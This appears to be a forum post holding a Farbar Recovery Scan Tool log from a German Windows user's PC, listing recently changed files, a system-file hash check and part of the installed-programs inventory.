2013-07-31 15:28 - 2013-07-31 15:27 - 02014600 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.712.zip
2013-07-31 14:48 - 2013-07-31 14:48 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2013-07-31 14:47 - 2012-03-23 19:58 - 00000000 ____D C:\Program Files\WinRAR
2013-07-31 14:37 - 2009-07-14 07:08 - 00032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2013-07-31 14:26 - 2013-07-31 14:26 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\WinRAR
2013-07-31 14:00 - 2013-07-31 14:00 - 01758824 _____ C:\Users\Niklas\Downloads\winrar-x64-420d (1).exe
2013-07-31 13:41 - 2013-07-31 13:42 - 00263592 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2013-07-31 13:41 - 2013-07-31 13:42 - 00175016 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2013-07-31 13:41 - 2013-07-31 13:42 - 00175016 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2013-07-31 13:41 - 2013-07-31 13:42 - 00096168 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2013-07-31 13:41 - 2013-07-31 13:41 - 00000000 ____D C:\Program Files (x86)\Java
2013-07-31 13:41 - 2013-07-31 13:40 - 31714728 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-i586.exe
2013-07-31 13:41 - 2012-08-06 10:08 - 00867240 _____ (Oracle Corporation) C:\Windows\SysWOW64\npdeployJava1.dll
2013-07-31 13:41 - 2011-10-27 22:03 - 00789416 _____ (Oracle Corporation) C:\Windows\SysWOW64\deployJava1.dll
2013-07-31 13:39 - 2013-07-31 13:37 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64 (1).exe
2013-07-31 13:30 - 2013-07-31 13:31 - 00312232 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe
2013-07-31 13:30 - 2013-07-31 13:31 - 00189352 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe
2013-07-31 13:30 - 2013-07-31 13:31 - 00188840 _____ (Oracle Corporation) C:\Windows\system32\java.exe
2013-07-31 13:30 - 2013-07-31 13:31 - 00108968 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2013-07-31 13:30 - 2012-01-19 19:55 - 01093032 _____ (Oracle Corporation) C:\Windows\system32\npdeployJava1.dll
2013-07-31 13:30 - 2011-10-27 22:04 - 00972712 _____ (Oracle Corporation) C:\Windows\system32\deployJava1.dll
2013-07-31 13:29 - 2013-07-31 13:28 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64.exe
2013-07-31 13:20 - 2011-10-27 22:03 - 00000000 ____D C:\Program Files\Java
2013-07-31 13:19 - 2013-07-31 13:19 - 00903080 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\chromeinstall-7u25.exe
2013-07-31 13:14 - 2013-07-31 13:14 - 02033732 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.1.738.zip
2013-07-28 19:18 - 2013-07-28 19:13 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Stella
2013-07-28 19:13 - 2013-07-28 19:13 - 01486815 _____ (The Stella Team                                             ) C:\Users\Niklas\Downloads\Stella-3.6-win32.exe
2013-07-28 19:13 - 2013-07-28 19:13 - 00000000 ____D C:\Program Files (x86)\Stella
2013-07-28 19:08 - 2013-07-28 19:08 - 00006628 _____ C:\Users\Niklas\Downloads\E.T. the Extra-Terrestrial.zip
2013-07-28 16:49 - 2013-07-28 16:49 - 00003000 _____ C:\{BE567149-6FEF-4828-835D-9A7A4805359B}
2013-07-28 16:43 - 2013-07-28 16:43 - 00000000 ____D C:\Windows\System32\Tasks\Norton Identity Safe
2013-07-28 15:04 - 2013-07-27 15:25 - 00000000 ____D C:\Program Files (x86)\Landwirtschafts Simulator 2013
2013-07-28 14:32 - 2012-01-21 15:51 - 00000000 ____D C:\Windows\AutoKMS
2013-07-28 14:28 - 2013-07-28 14:25 - 58909032 _____ (GIANTS Software                                             ) C:\Users\Niklas\Downloads\FarmingSimulator2013Patch1.4DE.exe
2013-07-27 23:36 - 2013-07-26 18:14 - 00000000 ____D C:\ProgramData\SystemExplorer
2013-07-27 23:36 - 2013-07-23 12:46 - 00000000 ___HD C:\Windows\Icons
2013-07-27 23:36 - 2013-07-22 13:12 - 00000000 ____D C:\Users\Niklas\Desktop\left4dead
2013-07-27 23:36 - 2013-07-21 15:23 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Secret Maryo Chronicles
2013-07-27 23:36 - 2013-06-23 11:26 - 00000000 ____D C:\Users\Niklas\Desktop 4
2013-07-27 23:36 - 2013-06-22 18:14 - 00000000 ____D C:\Program Files\Unlocker
2013-07-27 23:36 - 2013-05-28 19:37 - 00000000 ____D C:\Users\Niklas\Desktop\LogMeIn Hamachi
2013-07-27 23:36 - 2013-05-13 18:21 - 00000000 ____D C:\Users\.wh..wh.plnk
2013-07-27 23:36 - 2013-05-13 18:21 - 00000000 ____D C:\Users\.wh..wh.orph
2013-07-27 23:36 - 2013-04-21 18:24 - 00000000 ____D C:\Windows\pss
2013-07-27 23:36 - 2012-01-19 19:56 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\vlc
2013-07-27 23:36 - 2012-01-19 09:31 - 00000000 ____D C:\Users\SYSTEM
2013-07-27 23:36 - 2011-10-27 21:43 - 00000000 ____D C:\Program Files\Intel
2013-07-27 23:36 - 2011-10-27 21:34 - 00000000 ____D C:\ProgramData\Intel
2013-07-27 23:36 - 2011-10-27 21:33 - 00000000 ____D C:\Program Files\Common Files\Intel
2013-07-27 23:36 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\Branding
2013-07-27 23:36 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\AppCompat
2013-07-27 23:33 - 2013-07-22 12:04 - 00000000 ___HD C:\VTRoot
2013-07-27 23:33 - 2013-07-20 21:17 - 00000000 ____D C:\ProgramData\Package Cache
2013-07-27 23:33 - 2012-11-02 15:37 - 00000000 ____D C:\Users\Niklas\Documents\MAGIX
2013-07-27 23:33 - 2012-05-25 19:12 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Notepad++
2013-07-27 23:33 - 2012-01-19 09:33 - 00000000 ____D C:\Users\Niklas\AppData\Local\VirtualStore
2013-07-27 23:32 - 2011-10-27 21:43 - 00000000 ____D C:\Program Files (x86)\Cisco
2013-07-27 18:15 - 2013-07-27 18:15 - 00237126 _____ C:\Users\Niklas\Downloads\Bankofhagenstedt.exe
2013-07-27 16:49 - 2013-07-27 16:47 - 07406374 _____ C:\Users\Niklas\Downloads\VeenhuisW400.exe
2013-07-27 15:36 - 2013-07-27 15:35 - 00000000 ____D C:\Users\Niklas\Documents\My Games
2013-07-27 15:28 - 2013-07-27 15:28 - 00001287 _____ C:\Users\Niklas\Desktop\Landwirtschafts Simulator 2013 .lnk
2013-07-27 14:14 - 2013-07-27 14:14 - 00000000 ____D C:\Windows\System32\Tasks\Norton AntiVirus
2013-07-27 14:12 - 2013-07-27 14:12 - 00000000 ____D C:\Windows\system32\Drivers\NSTx64
2013-07-27 14:12 - 2013-07-27 14:12 - 00000000 ____D C:\Program Files (x86)\Norton Identity Safe
2013-07-27 14:11 - 2013-07-27 14:11 - 00003218 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2013-07-27 14:10 - 2013-07-27 14:10 - 00000000 ____D C:\Windows\system32\Drivers\NAVx64
2013-07-27 14:00 - 2013-07-27 13:53 - 186556480 ____N (Symantec Corporation) C:\Users\Niklas\Downloads\NAV-ESD-20-4-0-40-GE.exe
2013-07-27 13:50 - 2013-07-27 13:50 - 00867880 _____ C:\Users\Niklas\Downloads\Norton20_Removal_Tool.exe
2013-07-27 13:50 - 2013-07-27 13:50 - 00867880 _____ C:\Users\Niklas\Desktop\Norton20_Removal_Tool.exe
2013-07-27 13:42 - 2013-07-23 14:48 - 00195816 _____ C:\Users\Niklas\AppData\Local\GDIPFONTCACHEV1.DAT
2013-07-27 13:09 - 2012-09-02 13:23 - 00000000 ____D C:\Program Files (x86)\BlueJ
2013-07-26 20:32 - 2013-07-26 20:32 - 01975130 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.684 (2).zip
2013-07-26 20:32 - 2013-07-26 20:31 - 01975130 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.684 (1).zip
2013-07-26 19:42 - 2013-07-26 09:34 - 00633296 _____ C:\Windows\system32\FNTCACHE.DAT
2013-07-26 19:39 - 2013-07-26 19:38 - 00695296 _____ (AnjoCaido) C:\Users\Niklas\Desktop\minecraftSP.exe
2013-07-26 19:32 - 2013-06-21 22:45 - 00000000 ____D C:\Users\Niklas\Desktop\.minecraft
2013-07-26 19:26 - 2012-07-28 14:22 - 00000000 ____D C:\Dev-Cpp
2013-07-26 19:24 - 2013-07-26 19:24 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\TrojanHunter
2013-07-26 19:16 - 2013-07-26 19:16 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422 (1).exe
2013-07-26 19:03 - 2013-07-26 19:03 - 00059392 ____R C:\Windows\SysWOW64\streamhlp.dll
2013-07-26 19:03 - 2013-07-26 19:03 - 00000000 ____D C:\ProgramData\TrojanHunter
2013-07-26 18:23 - 2013-07-26 18:23 - 04292608 _____ C:\Users\Niklas\Downloads\hamachi_2.1.0.362.msi
2013-07-26 18:14 - 2013-07-26 18:13 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422.exe
2013-07-26 14:34 - 2013-07-26 14:34 - 00137266 _____ C:\Users\Niklas\Downloads\elegant.sit
2013-07-26 14:34 - 2013-07-26 14:34 - 00045185 _____ C:\Users\Niklas\Downloads\elegant.zip
2013-07-26 14:34 - 2013-07-26 14:34 - 00045185 _____ C:\Users\Niklas\Downloads\elegant (1).zip
2013-07-26 14:31 - 2013-07-26 14:31 - 00029060 _____ C:\Users\Niklas\Downloads\Acens.ttf
2013-07-26 09:34 - 2013-07-26 09:34 - 00000000 _____ C:\Windows\setuperr.log
2013-07-26 07:13 - 2013-08-18 18:38 - 02241024 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2013-07-26 07:13 - 2013-08-18 18:38 - 01365504 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2013-07-26 07:13 - 2013-08-18 18:38 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2013-07-26 07:12 - 2013-08-18 18:38 - 19239424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 15405056 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 03958784 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 02647040 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2013-07-26 07:12 - 2013-08-18 18:38 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2013-07-26 05:35 - 2013-08-18 18:38 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2013-07-26 05:13 - 2013-08-18 18:38 - 01767936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2013-07-26 05:13 - 2013-08-18 18:38 - 01141248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 14329344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 02877440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 02048512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00391168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2013-07-26 05:12 - 2013-08-18 18:38 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2013-07-26 05:11 - 2013-08-18 18:38 - 13761024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2013-07-26 05:11 - 2013-08-18 18:38 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2013-07-26 04:49 - 2013-08-18 18:38 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2013-07-26 04:39 - 2013-08-18 18:38 - 00089600 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2013-07-26 03:59 - 2013-08-18 18:38 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2013-07-25 17:36 - 2013-07-25 17:36 - 00000000 ____D C:\Users\Niklas\AppData\Local\{C938435F-A241-4E9B-80FC-B5E38F7C91FB}
2013-07-25 17:33 - 2013-07-25 17:33 - 00177672 _____ C:\Users\Niklas\Desktop\music1.OGG
2013-07-25 16:59 - 2013-07-25 16:58 - 10627171 _____ C:\Users\Niklas\Documents\lib.rar
2013-07-25 16:55 - 2013-07-25 16:54 - 01981647 _____ C:\Users\Niklas\Documents\minecraftforge-universal-1.5.2-7.8.0.686.zip
2013-07-25 14:39 - 2013-07-25 14:38 - 00570109 _____ C:\Users\Niklas\Downloads\billy-argel_beyond-sky.zip
2013-07-25 13:45 - 2013-07-25 13:45 - 00031788 _____ C:\Users\Niklas\Downloads\thump (1).wav
2013-07-25 11:25 - 2013-08-18 14:00 - 01888768 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2013-07-25 11:04 - 2013-07-25 11:04 - 00002457 _____ C:\Users\Niklas\Downloads\TextFieldDemo.jnlp
2013-07-25 11:04 - 2013-07-25 11:04 - 00002457 _____ C:\Users\Niklas\Downloads\TextFieldDemo (1).jnlp
2013-07-25 10:57 - 2013-08-15 13:53 - 01620992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2013-07-23 21:33 - 2013-07-23 10:36 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Rainmeter
2013-07-23 14:20 - 2012-01-21 11:21 - 00000000 ____D C:\Users\Niklas\.thumbnails
2013-07-23 14:05 - 2013-07-23 14:01 - 80978288 _____ (Intel(R) Corporation) C:\Users\Niklas\Downloads\Wireless_15.3.1_s64.exe
2013-07-23 13:51 - 2012-01-19 20:03 - 00003792 _____ C:\Windows\System32\Tasks\Adobe-Online-Aktualisierungsprogramm
2013-07-23 13:19 - 2013-06-23 11:20 - 00000000 ____D C:\Users\Niklas\Desktop 2
2013-07-23 12:49 - 2013-07-23 12:48 - 04891155 _____ C:\Users\Niklas\Downloads\Eminent.tip
2013-07-23 12:46 - 2013-07-23 12:46 - 01958858 _____ C:\Users\Niklas\Downloads\FarawayDream.tip
2013-07-23 12:28 - 2013-06-30 12:24 - 00000000 ____D C:\Windows\Minidump
2013-07-23 12:26 - 2013-07-23 12:25 - 04396440 _____ (Piriform Ltd) C:\Users\Niklas\Downloads\ccsetup403.exe
2013-07-23 12:13 - 2012-01-19 19:59 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2013-07-23 12:04 - 2013-07-23 12:03 - 02918488 _____ (Martin Malík - REALiX                                       ) C:\Users\Niklas\Downloads\hw64_420.exe
2013-07-23 11:01 - 2013-07-23 10:23 - 00000000 ____D C:\Windows\UXBackup
2013-07-23 10:43 - 2013-07-23 10:41 - 19067867 _____ C:\Users\Niklas\Downloads\omnimo_5_0_for_rainmeter_by_fediafedia.zip
2013-07-23 10:41 - 2013-07-23 10:41 - 05209550 _____ C:\Users\Niklas\Downloads\Omnimo Screenshots - Imgur.zip
2013-07-23 10:35 - 2013-07-23 10:35 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\IObit
2013-07-23 10:20 - 2013-07-23 10:20 - 01386624 _____ C:\Users\Niklas\Downloads\Rainmeter-2.5.exe
2013-07-23 10:20 - 2013-07-23 10:14 - 61091169 _____ C:\Users\Niklas\Downloads\8TP7.zip
2013-07-23 10:12 - 2013-07-23 10:12 - 04685607 _____ C:\Users\Niklas\Downloads\Minecraft-Modpack_1.6.2.zip

Files to move or delete:
====================
C:\Users\Niklas\devcpp-4.9.9.2_setup.exe
C:\Users\Niklas\Minecraft (2).exe
C:\Users\Niklas\prismsetup.exe
C:\Users\Niklas\SkypeSetup.exe
C:\Users\Niklas\SONIC.exe
C:\Users\Niklas\vpsetup.exe

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2013-07-26 16:41

==================== End Of Log
         
Hier die Addition.txt:
Code:
ATTFilter
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21-08-2013 02
Ran by Niklas at 2013-08-22 11:33:53
Running from C:\Users\Niklas\Desktop
Boot Mode: Normal
==========================================================


==================== Installed Programs =======================

   
µTorrent (x32 Version: 3.3.0.29677)
7-Zip 9.20 (x64 edition) (Version: 9.20.00.0)
Adobe AIR (x32 Version: 3.0.0.4080)
Adobe Flash Player 11 ActiveX (x32 Version: 11.6.602.171)
Adobe Flash Player 11 Plugin (x32 Version: 11.6.602.180)
Adobe Reader X (10.1.7) MUI (x32 Version: 10.1.7)
Advanced Archive Password Recovery (x32 Version: 4.54.48.1338)
ALDI SÜD Mah Jong (x32)
AMI VR-pulse OS Switcher (Version: 1.2)
Android SDK Tools (x32 Version: 1.16)
Angebote ALDI SÜD Bildschirmschoner (x32)
Ashampoo Burning Studio (x32 Version: 10.0.10)
Ashampoo Burning Studio 2010 Advanced (x32 Version: 9.2.4)
Ashampoo Photo Commander (x32 Version: 9.2.0)
Ashampoo Photo Commander 11 v.11.0.3 (x32 Version: 11.0.3)
Ashampoo Photo Optimizer (x32 Version: 4.0.0)
Ashampoo Snap (x32 Version: 4.3.0)
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (x32 Version: 1.0.0.39)
Audacity 2.0.3 (x32 Version: 2.0.3)
Avira Free Antivirus (x32 Version: 13.0.0.3885)
Axialis Screensaver Producer 4.2 (x32 Version: 4.2)
Bandisoft MPEG-1 Decoder (x32)
BandzPro (HKCU Version: 1.2.0.0)
BlueStacks App Player (x32 Version: 0.7.16.910)
BlueStacks Notification Center (x32 Version: 0.7.16.910)
BroadCam Video Streaming Server (x32)
Camtasia Studio 7 (x32 Version: 7.1.1)
CCleaner (Version: 3.28)
Cheat Engine 6.3 (x32)
CodeBlocks (HKCU Version: 10.05)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (x32 Version: 15.4.5722.2)
Corel Graphics - Windows Shell Extension (x32 Version: 15.2.0.686)
Corel Graphics - Windows Shell Extension (x32 Version: 15.2.686)
Corel Graphics - Windows Shell Extension 64 Bit (Version: 15.2.686)
CorelDRAW Essentials X5 - Common (x32 Version: 15.3)
CorelDRAW Essentials X5 - Connect (x32 Version: 15.3)
CorelDRAW Essentials X5 - Custom Data (x32 Version: 15.3)
CorelDRAW Essentials X5 - DE (x32 Version: 15.3)
CorelDRAW Essentials X5 - Draw (x32 Version: 15.3)
CorelDRAW Essentials X5 - EN (x32 Version: 15.3)
CorelDRAW Essentials X5 - ES (x32 Version: 15.3)
CorelDRAW Essentials X5 - Extra Content (x32 Version: 15.0)
CorelDRAW Essentials X5 - Extra Content (x32)
CorelDRAW Essentials X5 - Filters (x32 Version: 15.3)
CorelDRAW Essentials X5 - FR (x32 Version: 15.3)
CorelDRAW Essentials X5 - IPM (x32 Version: 15.3)
CorelDRAW Essentials X5 - IT (x32 Version: 15.3)
CorelDRAW Essentials X5 - PHOTO-PAINT (x32 Version: 15.3)
CorelDRAW Essentials X5 - Redist (x32 Version: 15.0)
CorelDRAW Essentials X5 - Setup Files (x32 Version: 15.3)
CorelDRAW Essentials X5 - WT (x32 Version: 15.3)
CorelDRAW Essentials X5 (x32 Version: 15.2.0.686)
CorelDRAW Essentials X5 (x32 Version: 15.3)
CyberLink LabelPrint (x32 Version: 2.5.3624)
CyberLink MediaEspresso (x32 Version: 6.5.1508_36229)
CyberLink MediaShow (x32 Version: 5.1.2414)
CyberLink PhotoNow (x32 Version: 1.1.0.6904)
CyberLink Power2Go (x32 Version: 7.0.0.1327)
CyberLink PowerDirector (x32 Version: 8.0.4020)
CyberLink PowerDVD 10 (x32 Version: 10.0.3225.02)
CyberLink PowerDVD Copy (x32 Version: 1.5.1306)
CyberLink PowerProducer (x32 Version: 5.0.2.3503)
CyberLink YouCam (x32 Version: 3.1.4013)
D3DX10 (x32 Version: 15.4.2368.0902)
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition
Dev-C++ 5 beta 9 release (4.9.9.2) (x32)
Dexpot (HKCU Version: 1.6.9)
DHTML Editing Component (x32 Version: 6.02.0001)
Die Abenteuer von Tim und Struppi - Das Geheimnis der Einhorn 1.0 (x32 Version: 1.0)
DIE SIEDLER - Das Erbe der Könige - Gold Edition (x32 Version: 1.00.0000)
Dolby Home Theater v4 (x32 Version: 7.2.7000.4)
Dungeon Lords Collector's Edition (x32 Version: 1.0.0)
DVD Decrypter (Remove Only) (x32)
Elsword_DE (x32)
Express Zip (x32)
FileZilla Client 3.7.1 (x32 Version: 3.7.1)
Firebird SQL Server - MAGIX Edition (x32 Version: 2.1.31.0)
FormatFactory 2.96 (x32 Version: 2.96)
Fotogalerija Windows Live (x32 Version: 15.4.3502.0922)
Free Fire Screensaver (x32)
Free FLV Converter V 7.5.0 (x32 Version: 7.5.0.0)
GadgetBox (x32 Version: 1.0)
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922)
GameMaker 8.1 (HKCU)
GBox Updater (x32)
GIMP 2.6.8
GlassFish Server Open Source Edition 3.1.2.2
Google Chrome (x32 Version: 28.0.1500.95)
Google Update Helper (x32 Version: 1.3.21.153)
Hex-Editor MX (x32 Version: 6.0)
Hurrican 1.0.0.4 (x32 Version: 1.0.0.4)
ImgBurn (x32 Version: 2.5.8.0)
Inkscape 0.48.4 (x32 Version: 0.48.4)
Intel PROSet Wireless
Intel PROSet Wireless (x32)
Intel(R) Control Center (x32 Version: 1.2.1.1007)
Intel(R) Management Engine Components (x32 Version: 7.0.0.1144)
Intel(R) Processor Graphics (x32 Version: 8.15.10.2538)
Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology (Version: 1.1.0.0537)
Intel(R) PROSet/Wireless WiFi Software (Version: 14.2.1000)
Intel(R) Rapid Storage Technology (x32 Version: 10.6.0.1002)
Intel(R) WiDi (x32 Version: 2.2.14.0)
Internet-TV für Windows Media Center (x32 Version: 4.2.2.0)
Java 7 Update 25 (64-bit) (Version: 7.0.250)
Java 7 Update 25 (x32 Version: 7.0.250)
Java Auto Updater (x32 Version: 2.1.9.5)
Java SE Development Kit 7 Update 5 (64-bit) (Version: 1.7.0.50)
JavaFX 2.1.1 (64-bit) (Version: 2.1.1)
JavaFX 2.1.1 SDK (64-bit) (Version: 2.1.1)
Junk Mail filter update (x32 Version: 15.4.3502.0922)
Kontrolnik Windows Live Mesh ActiveX za oddaljene povezave (x32 Version: 15.4.5722.2)
Landwirtschafts Simulator 2013 (x32 Version: 1.0)
Launch Manager (x32 Version: 1.5.1.4)
LEGO Digital Designer (x32)
LEGO Racers (x32)
LogMeIn Hamachi (x32 Version: 2.1.0.374)
MAGIX Content und Soundpools (x32 Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Demosongs) (Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Demosongs) (x32 Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Synthesizer und Effekte) (Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Synthesizer und Effekte) (x32 Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Version: 19.0.1.36)
MAGIX Music Maker 2013 Premium (Visuals) (Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (Visuals) (x32 Version: 1.0.0.0)
MAGIX Music Maker 2013 Premium (x32 Version: 19.0.1.36)
MAGIX Music Maker 2013 Premium Soundpools (Version: 1.0.0.0)
MAGIX Music Maker 2013 Soundpools (Version: 1.0.0.0)
MAGIX Screenshare (Version: 4.3.6.1987)
MAGIX Screenshare (x32 Version: 4.3.6.1987)
MAGIX Speed burnR (MSI) (Version: 7.0.2.6)
MAGIX Speed burnR (MSI) (x32 Version: 7.0.2.6)
MAGIX Video deluxe 2013 (Version: 12.0.0.32)
MAGIX Video deluxe 2013 (x32 Version: 12.0.0.32)
Medion Home Cinema (x32 Version: 8.0.3216)
Mesh Runtime (x32 Version: 15.4.5722.2)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319)
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319)
Microsoft .NET Framework 4 Multi-Targeting Pack (x32 Version: 4.0.30319)
Microsoft .NET Framework 4.5 (Version: 4.5.50709)
Microsoft Application Error Reporting (Version: 12.0.6015.5000)
Microsoft Application Error Reporting (x32 Version: 12.0.6012.5000)
Microsoft Help Viewer 1.0 (Version: 1.0.30319)
Microsoft Help Viewer 1.0 Language Pack - DEU (Version: 1.0.30319)
Microsoft Mathematics (64-Bit) (Version: 4.0)
Microsoft Office 2010 (x32 Version: 14.0.4763.1000)
Microsoft Office 2010 Service Pack 1 (SP1)
Microsoft Office Access MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Excel MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Groove MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office InfoPath MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Office 32-bit Components 2010 (Version: 14.0.6029.1000)
Microsoft Office OneNote MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Outlook MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office PowerPoint MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Professional Plus 2010 (Version: 14.0.6029.1000)
Microsoft Office Proof (English) 2010 (Version: 14.0.6029.1000)
Microsoft Office Proof (French) 2010 (Version: 14.0.6029.1000)
Microsoft Office Proof (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Proof (Italian) 2010 (Version: 14.0.6029.1000)
Microsoft Office Proofing (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Publisher MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Shared MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Word MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Silverlight (Version: 5.1.20513.0)
Microsoft SQL Server 2005 Compact Edition [ENU] (x32 Version: 3.1.0000)
Microsoft SQL Server 2008 (64-bit)
Microsoft SQL Server 2008 Browser (x32 Version: 10.1.2531.0)
Microsoft SQL Server 2008 Common Files (Version: 10.0.1600.22)
Microsoft SQL Server 2008 Common Files (Version: 10.1.2531.0)
Microsoft SQL Server 2008 Database Engine Services (Version: 10.1.2531.0)
Microsoft SQL Server 2008 Database Engine Shared (Version: 10.1.2531.0)
Microsoft SQL Server 2008 Native Client (Version: 10.1.2531.0)
Microsoft SQL Server 2008 RsFx Driver (Version: 10.1.2531.0)
Microsoft SQL Server Compact 3.5 SP2 DEU (x32 Version: 3.5.8080.0)
Microsoft SQL Server Compact 3.5 SP2 x64 DEU (Version: 3.5.8080.0)
